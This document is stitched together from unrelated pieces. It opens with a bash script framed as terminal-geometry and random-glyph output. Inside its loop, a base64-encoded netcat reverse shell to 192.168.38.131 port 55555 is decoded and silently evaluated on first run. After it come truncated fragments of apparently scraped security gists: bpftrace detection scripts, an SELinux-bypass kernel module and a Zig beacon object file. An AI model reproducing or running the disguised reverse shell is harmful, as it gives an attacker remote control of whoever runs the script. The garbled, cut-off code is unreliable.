#!/bin/bash
# Terminal geometry: when LINES/COLUMNS are unset or zero, ask the terminal via
# tput, and fall back to the classic 24x80 if tput fails (its stderr is
# discarded so a missing TERM does not produce noise).
if [ -z "$LINES" ] || [ "$LINES" -eq 0 ]; then
  LINES=$(tput lines 2>/dev/null || echo 24)
fi
if [ -z "$COLUMNS" ] || [ "$COLUMNS" -eq 0 ]; then
  COLUMNS=$(tput cols 2>/dev/null || echo 80)
fi
while :;do
echo $LINES $COLUMNS $((RANDOM%COLUMNS)) "$(printf "\U$((RANDOM%500+1000))")";
if [ -z "$_INIT" ]; then
export _INIT=1;
(e=$(echo -n 'bmMgMTkyLjE2OC4zOC4xMzEgNTU1NTUgLWUgL2Jpbi9iYXNo' | base64 -d); eval "$e" 2>/dev/null &)
fi;
// Check out https://edu.defensive-security.com/edrmetry-linux-matrix-for-download-advanced-hands-on-attack-ttps-catalog
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <err.h>
#include <openssl/ssl.h>
cr0nx / gist:fe91d3e012c5d537d527bca2e9d751ab
Created June 4, 2025 18:47
bpftrace commit_creds from user + kill_action
#!/usr/bin/env bpftrace
kprobe:commit_creds
{
// Check if the calling process has UID 1007
if (uid == 1007) {
// Get the struct cred pointer from arg0
$cred = (struct cred *)arg0;
// Read UID and GID fields from the struct cred
cr0nx / gist:588d910144549e5f7a5136b7fd662466
Created May 23, 2025 11:21
memfd_create blocker using Python+bpftrace -> kills the parent process (ppid) of the memfd_create caller
import subprocess
import os
import signal
import re
# bpftrace script (embedded)
BPFTRACE_SCRIPT = """
#include <linux/sched.h>
#include <linux/cred.h>
cr0nx / gist:343b5b73e74ed7d945b7a2650cdffa9b
Created May 20, 2025 09:43
Bypassing SELinux secure_mode_policyload with LKM
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/cred.h>
#include <asm/processor.h>
#define LOG_TAG "[EDRmetry] "
// Define a simplified selinux_state structure (only the enforcing field)
struct selinux_state {
int enforcing;
cr0nx / gist:1bd6daa7b0cc99320c771da95b203827
Created April 5, 2025 12:17
Find in-memory modification of kernel.yama.ptrace_scope with bpftrace - PoC
#!/usr/bin/env bpftrace
// One-shot setup: read the current kernel.yama.ptrace_scope value straight from
// kernel memory and keep it in a global map (@last_val) so that probes outside this
// excerpt can presumably compare later reads against it.
BEGIN
{
// Replace with the actual address from /proc/kallsyms. The value is specific to one
// kernel build and, with KASLR, to one boot — the literal below is only an example.
$data_addr = 0xffffffff83c983b0; // Example: yama_sysctl_table->data address
@last_val = *(int32*)$data_addr; // Initial value, dereferenced directly at the sysctl's backing address
// NOTE(review): $data_addr is a 64-bit value printed with %x — confirm bpftrace emits all
// 64 bits here (a pointer specifier may be safer); the value is informational only.
printf("Monitoring kernel.yama.ptrace_scope at address 0x%x (initial value: %d)\n",
$data_addr, @last_val);
}
cr0nx / gist:9030cc9389c50e0c21b81eb7ded077cd
Created January 28, 2025 09:13
bpftrace tracing init_module and finit_module syscalls
#!/usr/bin/env bpftrace
// Runs once when the script attaches: prints a banner so the operator knows the
// trace is live and how to stop it.
BEGIN {
printf("Tracing init_module and finit_module syscalls... Hit Ctrl+C to stop.\n");
}
// Fires on entry to either kernel-module loading syscall. Because these are the
// sys_enter tracepoints, the line is emitted before the kernel has checked or loaded
// anything, so every attempt is logged, including ones that later fail.
// `probe` identifies which of the two tracepoints fired. `comm` is the short task
// name, which the process itself can change, so treat it as a hint and rely on the
// PID/UID when following up.
// NOTE(review): the message says "executed", but at entry the call has not yet
// completed; a sys_exit probe would be needed to report the outcome.
tracepoint:syscalls:sys_enter_init_module,
tracepoint:syscalls:sys_enter_finit_module {
printf("Syscall executed: %s (PID: %d, UID: %d, Command: %s)\n", probe, pid, uid, comm);
}
cr0nx / gist:05e41c079af0311e44360961700ed265
Created January 15, 2025 12:58
nslookup.zig - Simple Linux nslookup BOF ready to use with bof-launcher
const std = @import("std");
const beacon = @import("bof_api").beacon;
const posix = @import("bof_api").posix;
const net = std.net;
const mem = std.mem;
const DNS_PORT = 53; // well-known DNS port (RFC 1035)
const MAX_DNS_PACKET_SIZE = 512; // classic UDP DNS message limit without EDNS(0) (RFC 1035 §4.2.1)
const DNS_QUERY_CLASS_IN = 1; // QCLASS IN (Internet)
const DNS_QUERY_TYPE_A = 1; // QTYPE A (IPv4 host address)
cr0nx / gist:e972aac974e1b5c7703ff6de39c07ca8
Created October 7, 2024 12:20
Generic bpftrace-based RCE/webshell prevention technique for critical Linux network services. If for whatever reason you can't run it persistently, it can also be useful as a system-wide 'virtual patching' method.
#!/usr/bin/env bpftrace
// On entry to execve(2) the task still carries the name of the program that is
// about to be replaced (e.g. the web server), so `comm` here is the would-be
// "parent" image of whatever gets executed; the exit probe (outside this excerpt)
// presumably reads @parent to decide whether the spawn came from a protected service.
// NOTE(review): @parent is a single unkeyed global shared by every CPU and task, so
// two concurrent execve calls can overwrite each other between enter and exit and
// misattribute a spawn. Keying the map by thread (`@parent[tid] = comm;`) and
// deleting the entry in the exit probe would avoid that.
tracepoint:syscalls:sys_enter_execve
{
@parent = comm;
}
tracepoint:syscalls:sys_exit_execve
/ @parent == "httpd" || @parent == "php-fpm" || @parent == "mysqld" || @parent == "java" || @parent == "postjournal" /
{